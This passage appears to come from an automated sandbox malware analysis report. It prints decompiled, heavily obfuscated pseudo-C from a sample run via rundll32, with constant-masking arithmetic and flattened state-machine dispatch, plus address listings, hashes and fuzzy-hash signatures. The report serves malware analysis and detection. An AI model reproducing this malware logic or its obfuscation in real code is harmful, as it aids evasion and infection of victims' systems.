				_v356 = _v356 >> 2;
				_t746 = 0x76;
				_t842 = 0x6cd454e;
				_v96 = 0x100;
				_t840 = 0xcf5796f;
				_v356 = _v356 * 9;
				_v356 = _v356 ^ 0x00e12344;
				_v232 = 0xe5489f;
				_v232 = _v232 * 0x62;
				_v232 = _v232 ^ 0x422e6763;
				_v232 = _v232 ^ 0x15e3beef;
				_v144 = 0x9d1c0d;
				_v144 = _v144 | 0x5a9db401;
				_v144 = _v144 ^ 0x5a9ceaa6;
				_v328 = 0xaba5b0;
				_v328 = _v328 + 0xfc55;
				_v328 = _v328 * 0x37;
				_v328 = _v328 * 0x78;
				_v328 = _v328 ^ 0x62b938e2;
				_v168 = 0x51360e;
				_v168 = _v168 << 2;
				_v168 = _v168 ^ 0x014a45e2;
				_v176 = 0x11fbeb;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x47e89d0f;
				_v216 = 0x8fcc87;
				_v216 = _v216 / _t746;
				_v216 = _v216 ^ 0xd2cd5e41;
				_v216 = _v216 ^ 0xd2c9cc36;
				_v184 = 0x8a666a;
				_v184 = _v184 * 0x6c;
				_v184 = _v184 ^ 0x3a66624b;
				_v288 = 0x12fc4d;
				_v288 = _v288 ^ 0x84b68421;
				_v288 = _v288 * 0x77;
				_v288 = _v288 ^ 0xa87aad10;
				_v296 = 0xb3f337;
				_v296 = _v296 >> 1;
				_v296 = _v296 + 0xffffa2d0;
				_v296 = _v296 + 0xffff98aa;
				_v296 = _v296 ^ 0x0050e375;
				_v160 = 0xa98b94;
				_v160 = _v160 ^ 0x93f8baf3;
				_v160 = _v160 ^ 0x935506dc;
				_v208 = 0xd26eef;
				_v208 = _v208 + 0xffff657d;
				_v208 = _v208 << 5;
				_v208 = _v208 ^ 0x1a3ecca6;
				_v280 = 0xce1cc4;
				_v280 = _v280 << 6;
				_v280 = _v280 << 0x10;
				_v280 = _v280 | 0xb3a7eb9b;
				_v280 = _v280 ^ 0xb3a418cd;
				while(1) {
					L1:
					_t747 = 0xb34e23f;
					while(1) {
						L2:
						while(1) {
							L3:
							_t690 = 0xa0b11f8;
							do {
								while(1) {
									L4:
									_t850 = _t725 - _t690;
									if(_t850 > 0) {
										break;
									}
									if(_t850 == 0) {
										_t700 = E007A4624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
										_t847 = _t847 + 0x14;
										__eflags = _t700;
										_t747 = 0xb34e23f;
										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
										goto L2;
									} else {
										if(_t725 == 0x24fa5ba) {
											_push(_v212);
											_push(_v156);
											_t701 = E007ADCF7(_v376, 0x791984, __eflags);
											_push(_v236);
											_push(_v124);
											_t704 = E00799462(_t701, _v368,  &_v116, E007ADCF7(_v268, 0x791814, __eflags), _v256, _v136);
											_t847 = _t847 + 0x24;
											__eflags = _t704 - _v240;
											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
											E0079A8B0(_v352, _t701, _v360);
											E0079A8B0(_v336, _t702, _v344);
											_t840 = 0xcf5796f;
											goto L13;
										} else {
											if(_t725 == 0x505fe8e) {
												_t631 =  &_v208; // 0x39346367
												E0079957D(_v116, _v160,  *_t631, _v272, _v280);
											} else {
												if(_t725 == _t842) {
													_push(_v340);
													_push(_v180);
													_t710 = E007ADCF7(_v148, 0x791854, __eflags);
													_pop(_t763);
													_t844 = _t710;
													_t711 = 0x48;
													_v104 = _t711;
													_t713 = E00791C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
													_t847 = _t847 + 0x28;
													__eflags = _t713 - _v164;
													if(_t713 != _v164) {
														_t725 = _t840;
													} else {
														_t834 =  *0x7b3dfc; // 0x0
														E0079ED7E(_v244, _t834, _v228,  &_v68, 0x40);
														_t847 = _t847 + 0xc;
														_t725 = 0x9bcfe4f;
													}
													E0079A8B0(_v132, _t844, _v384);
													goto L13;
												} else {
													if(_t725 == 0x7252bf3) {
														_t725 = 0x24fa5ba;
														continue;
													} else {
														if(_t725 == _t819) {
															_t717 = E0079B144(_v120, _v188, _v308, _v128, _v348, _v292);
															_t847 = _t847 + 0x10;
															__eflags = _t717 - _v152;
															_t725 =  ==  ? _t842 : _t840;
															while(1) {
																L1:
																_t747 = 0xb34e23f;
																L2:
																L3:
																_t690 = 0xa0b11f8;
																goto L4;
															}
														} else {
															_t856 = _t725 - 0x9bcfe4f;
															if(_t725 == 0x9bcfe4f) {
																_push(_v172);
																_push(_v380);
																_t719 = E007ADCF7(_v324, 0x791854, _t856);
																_pop(_t772);
																E0079AA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
																_t725 =  ==  ? 0xa0b11f8 : _t840;
																E0079A8B0(_v220, _t719, _v356);
																_t847 = _t847 + 0x2c;
																L13:
																_t842 = 0x6cd454e;
																L32:
																_t819 = 0x9b01f0f;
																_t747 = 0xb34e23f;
																_t690 = 0xa0b11f8;
															}
															goto L33;
														}
													}
												}
											}
										}
									}
									L36:
									return _t846;
								}
								__eflags = _t725 - _t747;
								if(_t725 == _t747) {
									_t691 = E00792BD9(_v112);
									_t725 = 0xb500bcf;
									__eflags = _t691;
									_t846 =  !=  ? 1 : _t846;
									goto L32;
								} else {
									__eflags = _t725 - 0xb500bcf;
									if(_t725 == 0xb500bcf) {
										E007ACA69(_v112, _v168, _v176);
										_t725 = 0xcc5fcc9;
										goto L1;
									} else {
										__eflags = _t725 - 0xcc5fcc9;
										if(_t725 == 0xcc5fcc9) {
											E0079A958(_v216, _v108, _v184);
											_t725 = _t840;
											while(1) {
												L1:
												_t747 = 0xb34e23f;
												goto L2;
											}
										} else {
											__eflags = _t725 - _t840;
											if(_t725 == _t840) {
												E0079A958(_v288, _v120, _v296);
												_t725 = 0x505fe8e;
												while(1) {
													L1:
													_t747 = 0xb34e23f;
													goto L2;
												}
											} else {
												__eflags = _t725 - 0xec78b05;
												if(__eflags != 0) {
													goto L33;
												} else {
													_v104 = _v96;
													_t697 = E007992C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
													_t847 = _t847 + 0x14;
													__eflags = _t697 - _v192;
													_t819 = 0x9b01f0f;
													_t747 = 0xb34e23f;
													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
													goto L3;
												}
											}
										}
									}
								}
								goto L36;
								L33:
							} while (_t725 != 0xc75135f);
							goto L36;
						}
					}
				}
			}





















































































































                                                                                                                          0x0079bb84
                                                                                                                          0x0079bb9c
                                                                                                                          0x0079bba3
                                                                                                                          0x0079bba8
                                                                                                                          0x0079bbab
                                                                                                                          0x0079bbac
                                                                                                                          0x0079bbae
                                                                                                                          0x0079bbb3
                                                                                                                          0x0079bbb4
                                                                                                                          0x0079bbc7
                                                                                                                          0x0079bbce
                                                                                                                          0x0079bbd9
                                                                                                                          0x0079bbe4
                                                                                                                          0x0079bbf4
                                                                                                                          0x0079bbfb
                                                                                                                          0x0079bc06
                                                                                                                          0x0079bc0e
                                                                                                                          0x0079bc1b
                                                                                                                          0x0079bc1f
                                                                                                                          0x0079bc27
                                                                                                                          0x0079bc2f
                                                                                                                          0x0079bc3a
                                                                                                                          0x0079bc42
                                                                                                                          0x0079bc49
                                                                                                                          0x0079bc54
                                                                                                                          0x0079bc5c
                                                                                                                          0x0079bc64
                                                                                                                          0x0079bc69
                                                                                                                          0x0079bc71
                                                                                                                          0x0079bc79
                                                                                                                          0x0079bc84
                                                                                                                          0x0079bc8f
                                                                                                                          0x0079bc9a
                                                                                                                          0x0079bca5
                                                                                                                          0x0079bcad
                                                                                                                          0x0079bcc3
                                                                                                                          0x0079bcca
                                                                                                                          0x0079bcd5
                                                                                                                          0x0079bce7
                                                                                                                          0x0079bcec
                                                                                                                          0x0079bcf5
                                                                                                                          0x0079bd00
                                                                                                                          0x0079bd0b
                                                                                                                          0x0079bd16
                                                                                                                          0x0079bd21
                                                                                                                          0x0079bd29
                                                                                                                          0x0079bd36
                                                                                                                          0x0079bd39
                                                                                                                          0x0079bd3d
                                                                                                                          0x0079bd45
                                                                                                                          0x0079bd4d
                                                                                                                          0x0079bd58
                                                                                                                          0x0079bd63
                                                                                                                          0x0079bd6e
                                                                                                                          0x0079bd79
                                                                                                                          0x0079bd8f
                                                                                                                          0x0079bd9d
                                                                                                                          0x0079bda2
                                                                                                                          0x0079bdab
                                                                                                                          0x0079bdb6
                                                                                                                          0x0079bdc1
                                                                                                                          0x0079bdc9
                                                                                                                          0x0079bdd1
                                                                                                                          0x0079bdd9
                                                                                                                          0x0079bde1
                                                                                                                          0x0079bde9
                                                                                                                          0x0079bdf4
                                                                                                                          0x0079bdfb
                                                                                                                          0x0079be06
                                                                                                                          0x0079be11
                                                                                                                          0x0079be1c
                                                                                                                          0x0079be27
                                                                                                                          0x0079be32
                                                                                                                          0x0079be3d
                                                                                                                          0x0079be48
                                                                                                                          0x0079be53
                                                                                                                          0x0079be5e
                                                                                                                          0x0079be69
                                                                                                                          0x0079be74
                                                                                                                          0x0079be7f
                                                                                                                          0x0079be92
                                                                                                                          0x0079be95
                                                                                                                          0x0079be9c
                                                                                                                          0x0079bea4
                                                                                                                          0x0079beaf
                                                                                                                          0x0079bec5
                                                                                                                          0x0079becc
                                                                                                                          0x0079bed7
                                                                                                                          0x0079bee2
                                                                                                                          0x0079beea
                                                                                                                          0x0079bef2
                                                                                                                          0x0079beff
                                                                                                                          0x0079bf02
                                                                                                                          0x0079bf06
                                                                                                                          0x0079bf0e
                                                                                                                          0x0079bf19
                                                                                                                          0x0079bf24
                                                                                                                          0x0079bf2b
                                                                                                                          0x0079bf36
                                                                                                                          0x0079bf3e
                                                                                                                          0x0079bf43
                                                                                                                          0x0079bf4b
                                                                                                                          0x0079bf53
                                                                                                                          0x0079bf5b
                                                                                                                          0x0079bf63
                                                                                                                          0x0079bf6b
                                                                                                                          0x0079bf78
                                                                                                                          0x0079bf7c
                                                                                                                          0x0079bf84
                                                                                                                          0x0079bf90
                                                                                                                          0x0079bf93
                                                                                                                          0x0079bf97
                                                                                                                          0x0079bf9f
                                                                                                                          0x0079bfa7
                                                                                                                          0x0079bfaf
                                                                                                                          0x0079bfbc
                                                                                                                          0x0079bfc0
                                                                                                                          0x0079bfc8
                                                                                                                          0x0079bfcd
                                                                                                                          0x0079bfd5
                                                                                                                          0x0079bfe0
                                                                                                                          0x0079bfeb
                                                                                                                          0x0079bff8
                                                                                                                          0x0079c007
                                                                                                                          0x0079c00a
                                                                                                                          0x0079c00e
                                                                                                                          0x0079c013
                                                                                                                          0x0079c01b
                                                                                                                          0x0079c023
                                                                                                                          0x0079c033
                                                                                                                          0x0079c037
                                                                                                                          0x0079c03c
                                                                                                                          0x0079c044
                                                                                                                          0x0079c04c
                                                                                                                          0x0079c05f
                                                                                                                          0x0079c062
                                                                                                                          0x0079c069
                                                                                                                          0x0079c074
                                                                                                                          0x0079c07f
                                                                                                                          0x0079c08a
                                                                                                                          0x0079c095
                                                                                                                          0x0079c0a2
                                                                                                                          0x0079c0a6
                                                                                                                          0x0079c0ae
                                                                                                                          0x0079c0b6
                                                                                                                          0x0079c0be
                                                                                                                          0x0079c0c6
                                                                                                                          0x0079c0ce
                                                                                                                          0x0079c0d6
                                                                                                                          0x0079c0de
                                                                                                                          0x0079c0e6
                                                                                                                          0x0079c0f1
                                                                                                                          0x0079c0fc
                                                                                                                          0x0079c107
                                                                                                                          0x0079c112
                                                                                                                          0x0079c11d
                                                                                                                          0x0079c124
                                                                                                                          0x0079c12f
                                                                                                                          0x0079c137
                                                                                                                          0x0079c13f
                                                                                                                          0x0079c147
                                                                                                                          0x0079c14c
                                                                                                                          0x0079c154
                                                                                                                          0x0079c166
                                                                                                                          0x0079c16b
                                                                                                                          0x0079c174
                                                                                                                          0x0079c17f
                                                                                                                          0x0079c18a
                                                                                                                          0x0079c195
                                                                                                                          0x0079c19d
                                                                                                                          0x0079c1a8
                                                                                                                          0x0079c1b0
                                                                                                                          0x0079c1b8
                                                                                                                          0x0079c1c0
                                                                                                                          0x0079c1c5
                                                                                                                          0x0079c1cd
                                                                                                                          0x0079c1d8
                                                                                                                          0x0079c1e3
                                                                                                                          0x0079c1ee
                                                                                                                          0x0079c1fa
                                                                                                                          0x0079c1fd
                                                                                                                          0x0079c201
                                                                                                                          0x0079c206
                                                                                                                          0x0079c20e
                                                                                                                          0x0079c216
                                                                                                                          0x0079c223
                                                                                                                          0x0079c238
                                                                                                                          0x0079c23b
                                                                                                                          0x0079c242
                                                                                                                          0x0079c24d
                                                                                                                          0x0079c258
                                                                                                                          0x0079c26e
                                                                                                                          0x0079c275
                                                                                                                          0x0079c280
                                                                                                                          0x0079c293
                                                                                                                          0x0079c296
                                                                                                                          0x0079c29d
                                                                                                                          0x0079c2a8
                                                                                                                          0x0079c2b0
                                                                                                                          0x0079c2c0
                                                                                                                          0x0079c2c4
                                                                                                                          0x0079c2cc
                                                                                                                          0x0079c2d4
                                                                                                                          0x0079c2dc
                                                                                                                          0x0079c2e4
                                                                                                                          0x0079c2ec
                                                                                                                          0x0079c2f1
                                                                                                                          0x0079c2f9
                                                                                                                          0x0079c306
                                                                                                                          0x0079c307
                                                                                                                          0x0079c30b
                                                                                                                          0x0079c313
                                                                                                                          0x0079c31b
                                                                                                                          0x0079c323
                                                                                                                          0x0079c32e
                                                                                                                          0x0079c336
                                                                                                                          0x0079c341
                                                                                                                          0x0079c349
                                                                                                                          0x0079c351
                                                                                                                          0x0079c361
                                                                                                                          0x0079c365
                                                                                                                          0x0079c36d
                                                                                                                          0x0079c378
                                                                                                                          0x0079c380
                                                                                                                          0x0079c38b
                                                                                                                          0x0079c396
                                                                                                                          0x0079c3a3
                                                                                                                          0x0079c3a7
                                                                                                                          0x0079c3af
                                                                                                                          0x0079c3b7
                                                                                                                          0x0079c3cb
                                                                                                                          0x0079c3d2
                                                                                                                          0x0079c3dd
                                                                                                                          0x0079c3e8
                                                                                                                          0x0079c3f0
                                                                                                                          0x0079c3fa
                                                                                                                          0x0079c3fe
                                                                                                                          0x0079c406
                                                                                                                          0x0079c40e
                                                                                                                          0x0079c419
                                                                                                                          0x0079c424
                                                                                                                          0x0079c42c
                                                                                                                          0x0079c437
                                                                                                                          0x0079c43f
                                                                                                                          0x0079c447
                                                                                                                          0x0079c455
                                                                                                                          0x0079c456
                                                                                                                          0x0079c45b
                                                                                                                          0x0079c466
                                                                                                                          0x0079c46b
                                                                                                                          0x0079c46f
                                                                                                                          0x0079c477
                                                                                                                          0x0079c48a
                                                                                                                          0x0079c491
                                                                                                                          0x0079c49c
                                                                                                                          0x0079c4a7
                                                                                                                          0x0079c4b2
                                                                                                                          0x0079c4bd
                                                                                                                          0x0079c4c8
                                                                                                                          0x0079c4d0
                                                                                                                          0x0079c4dd
                                                                                                                          0x0079c4e6
                                                                                                                          0x0079c4ea
                                                                                                                          0x0079c4f2
                                                                                                                          0x0079c4fd
                                                                                                                          0x0079c505
                                                                                                                          0x0079c510
                                                                                                                          0x0079c51b
                                                                                                                          0x0079c523
                                                                                                                          0x0079c52e
                                                                                                                          0x0079c542
                                                                                                                          0x0079c549
                                                                                                                          0x0079c554
                                                                                                                          0x0079c55f
                                                                                                                          0x0079c572
                                                                                                                          0x0079c579
                                                                                                                          0x0079c584
                                                                                                                          0x0079c594
                                                                                                                          0x0079c5a1
                                                                                                                          0x0079c5a5
                                                                                                                          0x0079c5ad
                                                                                                                          0x0079c5b5
                                                                                                                          0x0079c5b9
                                                                                                                          0x0079c5c1
                                                                                                                          0x0079c5c9
                                                                                                                          0x0079c5d1
                                                                                                                          0x0079c5dc
                                                                                                                          0x0079c5e7
                                                                                                                          0x0079c5f2
                                                                                                                          0x0079c5fd
                                                                                                                          0x0079c608
                                                                                                                          0x0079c610
                                                                                                                          0x0079c61b
                                                                                                                          0x0079c623
                                                                                                                          0x0079c628
                                                                                                                          0x0079c62d
                                                                                                                          0x0079c635
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c642
                                                                                                                          0x0079c642
                                                                                                                          0x0079c647
                                                                                                                          0x0079c647
                                                                                                                          0x0079c647
                                                                                                                          0x0079c64c
                                                                                                                          0x0079c64c
                                                                                                                          0x0079c64c
                                                                                                                          0x0079c64c
                                                                                                                          0x0079c64e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079c654
                                                                                                                          0x0079c917
                                                                                                                          0x0079c91c
                                                                                                                          0x0079c924
                                                                                                                          0x0079c926
                                                                                                                          0x0079c92b
                                                                                                                          0x00000000
                                                                                                                          0x0079c65a
                                                                                                                          0x0079c660
                                                                                                                          0x0079c83b
                                                                                                                          0x0079c847
                                                                                                                          0x0079c852
                                                                                                                          0x0079c857
                                                                                                                          0x0079c865
                                                                                                                          0x0079c89e
                                                                                                                          0x0079c8a5
                                                                                                                          0x0079c8b4
                                                                                                                          0x0079c8c5
                                                                                                                          0x0079c8c8
                                                                                                                          0x0079c8d8
                                                                                                                          0x0079c8de
                                                                                                                          0x00000000
                                                                                                                          0x0079c666
                                                                                                                          0x0079c66c
                                                                                                                          0x0079ca66
                                                                                                                          0x0079ca7b
                                                                                                                          0x0079c672
                                                                                                                          0x0079c674
                                                                                                                          0x0079c779
                                                                                                                          0x0079c782
                                                                                                                          0x0079c790
                                                                                                                          0x0079c796
                                                                                                                          0x0079c799
                                                                                                                          0x0079c7a2
                                                                                                                          0x0079c7ac
                                                                                                                          0x0079c7e3
                                                                                                                          0x0079c7e8
                                                                                                                          0x0079c7eb
                                                                                                                          0x0079c7f2
                                                                                                                          0x0079c821
                                                                                                                          0x0079c7f4
                                                                                                                          0x0079c805
                                                                                                                          0x0079c812
                                                                                                                          0x0079c817
                                                                                                                          0x0079c81a
                                                                                                                          0x0079c81a
                                                                                                                          0x0079c830
                                                                                                                          0x00000000
                                                                                                                          0x0079c67a
                                                                                                                          0x0079c680
                                                                                                                          0x0079c76f
                                                                                                                          0x00000000
                                                                                                                          0x0079c686
                                                                                                                          0x0079c688
                                                                                                                          0x0079c752
                                                                                                                          0x0079c759
                                                                                                                          0x0079c765
                                                                                                                          0x0079c767
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c642
                                                                                                                          0x0079c647
                                                                                                                          0x0079c647
                                                                                                                          0x00000000
                                                                                                                          0x0079c647
                                                                                                                          0x0079c68e
                                                                                                                          0x0079c68e
                                                                                                                          0x0079c694
                                                                                                                          0x0079c69a
                                                                                                                          0x0079c6a6
                                                                                                                          0x0079c6ae
                                                                                                                          0x0079c6b4
                                                                                                                          0x0079c6f8
                                                                                                                          0x0079c71c
                                                                                                                          0x0079c71f
                                                                                                                          0x0079c724
                                                                                                                          0x0079c727
                                                                                                                          0x0079c727
                                                                                                                          0x0079ca3e
                                                                                                                          0x0079ca3e
                                                                                                                          0x0079ca43
                                                                                                                          0x0079ca48
                                                                                                                          0x0079ca48
                                                                                                                          0x00000000
                                                                                                                          0x0079c694
                                                                                                                          0x0079c688
                                                                                                                          0x0079c680
                                                                                                                          0x0079c674
                                                                                                                          0x0079c66c
                                                                                                                          0x0079c660
                                                                                                                          0x0079ca85
                                                                                                                          0x0079ca8f
                                                                                                                          0x0079ca8f
                                                                                                                          0x0079c933
                                                                                                                          0x0079c935
                                                                                                                          0x0079ca2c
                                                                                                                          0x0079ca33
                                                                                                                          0x0079ca39
                                                                                                                          0x0079ca3b
                                                                                                                          0x00000000
                                                                                                                          0x0079c93b
                                                                                                                          0x0079c93b
                                                                                                                          0x0079c941
                                                                                                                          0x0079ca15
                                                                                                                          0x0079ca1b
                                                                                                                          0x00000000
                                                                                                                          0x0079c947
                                                                                                                          0x0079c947
                                                                                                                          0x0079c94d
                                                                                                                          0x0079c9f3
                                                                                                                          0x0079c9f9
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c63d
                                                                                                                          0x00000000
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c953
                                                                                                                          0x0079c953
                                                                                                                          0x0079c955
                                                                                                                          0x0079c9ce
                                                                                                                          0x0079c9d4
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c63d
                                                                                                                          0x00000000
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c957
                                                                                                                          0x0079c957
                                                                                                                          0x0079c95d
                                                                                                                          0x00000000
                                                                                                                          0x0079c963
                                                                                                                          0x0079c97c
                                                                                                                          0x0079c995
                                                                                                                          0x0079c99c
                                                                                                                          0x0079c9ab
                                                                                                                          0x0079c9ad
                                                                                                                          0x0079c9b2
                                                                                                                          0x0079c9b7
                                                                                                                          0x00000000
                                                                                                                          0x0079c9b7
                                                                                                                          0x0079c95d
                                                                                                                          0x0079c955
                                                                                                                          0x0079c94d
                                                                                                                          0x0079c941
                                                                                                                          0x00000000
                                                                                                                          0x0079ca4d
                                                                                                                          0x0079ca4d
                                                                                                                          0x00000000
                                                                                                                          0x0079ca59
                                                                                                                          0x0079c647
                                                                                                                          0x0079c642

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                          • API String ID: 0-258179307
                                                                                                                          • Opcode ID: a8732ae385b22025627bcf52e5f6f534e042fbc463a480e96cf918d630764c11
                                                                                                                          • Instruction ID: dcc1f17940c3d4199c0e51f2254cc3bb2f2393af1d8e5d93afd6f76a240d0685
                                                                                                                          • Opcode Fuzzy Hash: a8732ae385b22025627bcf52e5f6f534e042fbc463a480e96cf918d630764c11
                                                                                                                          • Instruction Fuzzy Hash: E1720FB1509381DFD779CF25D58AA9BBBE2BBC4304F10891DE6CA86260D7B58949CF03
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A4B87 Relevance: 21.9, Strings: 17, Instructions: 604COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E007A4B87(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				void* _t703;
				void* _t707;
				signed int _t708;
				signed int _t717;
				void* _t730;
				void* _t736;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				void* _t758;
				signed int _t798;
				void* _t803;
				void* _t804;
				void* _t811;

				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0xa2c333;
				_v2612 = 0xd97943;
				_v2696 = 0x74b91;
				_v2696 = _v2696 + 0xffffab65;
				_v2696 = _v2696 ^ 0x0006f6df;
				_v2804 = 0x130b03;
				_v2804 = _v2804 << 9;
				_v2804 = _v2804 + 0x8374;
				_v2804 = _v2804 ^ 0x26068974;
				_v2876 = 0x240a80;
				_v2876 = _v2876 >> 6;
				_v2876 = _v2876 >> 5;
				_v2876 = _v2876 ^ 0x3e269fec;
				_v2876 = _v2876 ^ 0x3e253447;
				_v2924 = 0x49db5b;
				_v2924 = _v2924 + 0xd552;
				_t803 = __ecx;
				_t798 = 0xce4571;
				_t738 = 0x27;
				_v2924 = _v2924 / _t738;
				_v2924 = _v2924 + 0x3019;
				_v2924 = _v2924 ^ 0x0006d24f;
				_v2796 = 0xf8ea63;
				_v2796 = _v2796 << 3;
				_v2796 = _v2796 + 0x8798;
				_v2796 = _v2796 ^ 0x07c9cae5;
				_v2864 = 0x679d3b;
				_t739 = 0x25;
				_v2864 = _v2864 * 0x7a;
				_v2864 = _v2864 / _t739;
				_v2864 = _v2864 << 0xc;
				_v2864 = _v2864 ^ 0x5a5eda92;
				_v2688 = 0xbc1f25;
				_v2688 = _v2688 << 0xd;
				_v2688 = _v2688 ^ 0x83e15555;
				_v2700 = 0xc3e9b4;
				_v2700 = _v2700 ^ 0x7e7d7a5b;
				_v2700 = _v2700 ^ 0x7ebc2479;
				_v2684 = 0x348655;
				_v2684 = _v2684 + 0xffff5240;
				_v2684 = _v2684 ^ 0x0038d539;
				_v2836 = 0xc8c90d;
				_v2836 = _v2836 | 0x6050777e;
				_v2836 = _v2836 + 0xfffffb37;
				_v2836 = _v2836 << 0xe;
				_v2836 = _v2836 ^ 0x3ea8df0c;
				_v2664 = 0x4ea234;
				_v2664 = _v2664 ^ 0x152f142f;
				_v2664 = _v2664 ^ 0x1568dd81;
				_v2900 = 0xa78742;
				_v2900 = _v2900 * 0x70;
				_v2900 = _v2900 + 0x89c7;
				_v2900 = _v2900 * 0x26;
				_v2900 = _v2900 ^ 0xe13351a3;
				_v2752 = 0x43c729;
				_v2752 = _v2752 * 9;
				_v2752 = _v2752 >> 0xc;
				_v2752 = _v2752 ^ 0x0004a0a7;
				_v2656 = 0x163ba0;
				_v2656 = _v2656 | 0x3b2cca0a;
				_v2656 = _v2656 ^ 0x3b3c61f3;
				_v2800 = 0x539f85;
				_v2800 = _v2800 + 0xffff9927;
				_v2800 = _v2800 >> 0xd;
				_v2800 = _v2800 ^ 0x000ca278;
				_v2892 = 0xaa9f70;
				_v2892 = _v2892 | 0xffd04745;
				_t740 = 0x33;
				_v2892 = _v2892 * 0x48;
				_v2892 = _v2892 + 0xabed;
				_v2892 = _v2892 ^ 0xfe85b4b6;
				_v2728 = 0x66b1f8;
				_v2728 = _v2728 + 0xffffb85a;
				_v2728 = _v2728 + 0xffff17c5;
				_v2728 = _v2728 ^ 0x00666892;
				_v2792 = 0x34b823;
				_v2792 = _v2792 + 0x705f;
				_v2792 = _v2792 | 0x13d147dd;
				_v2792 = _v2792 ^ 0x13fd2081;
				_v2884 = 0x7f5269;
				_v2884 = _v2884 >> 0x10;
				_v2884 = _v2884 + 0xdf59;
				_v2884 = _v2884 ^ 0x086ba2e3;
				_v2884 = _v2884 ^ 0x086346ed;
				_v2784 = 0x4150c;
				_v2784 = _v2784 ^ 0xadfae27c;
				_v2784 = _v2784 << 0xf;
				_v2784 = _v2784 ^ 0x7bb89155;
				_v2860 = 0x3ff4f9;
				_v2860 = _v2860 + 0x97ef;
				_v2860 = _v2860 ^ 0x8a52113e;
				_v2860 = _v2860 * 0x3b;
				_v2860 = _v2860 ^ 0xd244680a;
				_v2920 = 0xf20633;
				_v2920 = _v2920 >> 0xa;
				_v2920 = _v2920 << 6;
				_v2920 = _v2920 | 0x86ded8f3;
				_v2920 = _v2920 ^ 0x86d0715a;
				_v2676 = 0xbc4416;
				_v2676 = _v2676 + 0x253a;
				_v2676 = _v2676 ^ 0x00bded5f;
				_v2928 = 0x15fa7c;
				_v2928 = _v2928 >> 1;
				_v2928 = _v2928 * 0x6e;
				_v2928 = _v2928 >> 4;
				_v2928 = _v2928 ^ 0x00445a38;
				_v2844 = 0xaff44e;
				_v2844 = _v2844 * 0x28;
				_v2844 = _v2844 ^ 0x281c7ad4;
				_v2844 = _v2844 * 0xe;
				_v2844 = _v2844 ^ 0xcf625ac8;
				_v2744 = 0x5c05ba;
				_v2744 = _v2744 << 1;
				_v2744 = _v2744 ^ 0x54918a83;
				_v2744 = _v2744 ^ 0x542c1472;
				_v2904 = 0xa399f4;
				_v2904 = _v2904 / _t740;
				_t741 = 9;
				_v2904 = _v2904 / _t741;
				_v2904 = _v2904 >> 0xb;
				_v2904 = _v2904 ^ 0x000d27e7;
				_v2912 = 0xbe4d5b;
				_v2912 = _v2912 << 2;
